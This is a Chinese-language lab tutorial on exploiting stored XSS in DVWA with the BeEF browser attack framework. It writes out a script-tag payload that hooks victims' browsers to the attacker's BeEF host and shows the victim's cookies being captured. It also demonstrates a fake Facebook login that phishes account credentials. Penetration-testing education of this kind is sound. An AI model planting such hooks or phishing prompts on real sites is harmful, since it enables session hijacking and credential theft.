xss实战(利用beef渗透框架)

beef介绍

BeEF是浏览器攻击框架的简称，是一款专注于浏览器端的渗透测试工具

实验环境

kalilinux(192.168.8.133)
win10专业版(10.61.248.249)
win7旗舰版(192.168.8.137)
OWASP Broken Web Apps VM v1.2(192.168.8.135)

利用xss漏洞

打开kalilinux，在终端输入beef-xss打开beef工具

我们使用win10作为攻击机进入到OWASP Broken Web Apps VM v1.2的dvwa的XSS stored模块
在message的位置输入<script src="http://192.168.8.133:3000/hook.js"></script>

利用beef对xss进行利用

我们进入到beef的网站，win10下输入192.168.8.133:3000/ui/panel，默认账号为beef，默认密码为beef

这时win7模拟客户进入了192.168.8.135，不小心点到了xss stored的网页，beef左上角就会有win7电脑的显示，中间会显示win7客户的cookie信息等等

下面就是所有可以用的利用模块

这里不一一演示，演示一个社会工程学的案例

在客户端xin7查看，发现多了一个facebook的登入页面，客户以为是网站需要输入了自己的账号密码

这时你的账号密码就已经被攻击者拿到了

里面还有非常多的攻击方式，可以自己动手都试试